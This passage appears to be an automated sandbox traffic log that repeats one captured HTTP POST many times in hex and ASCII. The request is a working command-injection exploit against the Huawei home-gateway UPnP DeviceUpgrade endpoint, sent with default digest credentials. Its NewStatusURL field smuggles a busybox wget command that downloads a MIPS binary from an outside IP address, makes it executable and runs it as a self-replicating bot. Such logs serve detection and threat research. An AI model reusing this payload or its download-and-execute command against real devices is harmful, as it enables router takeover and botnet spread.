6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 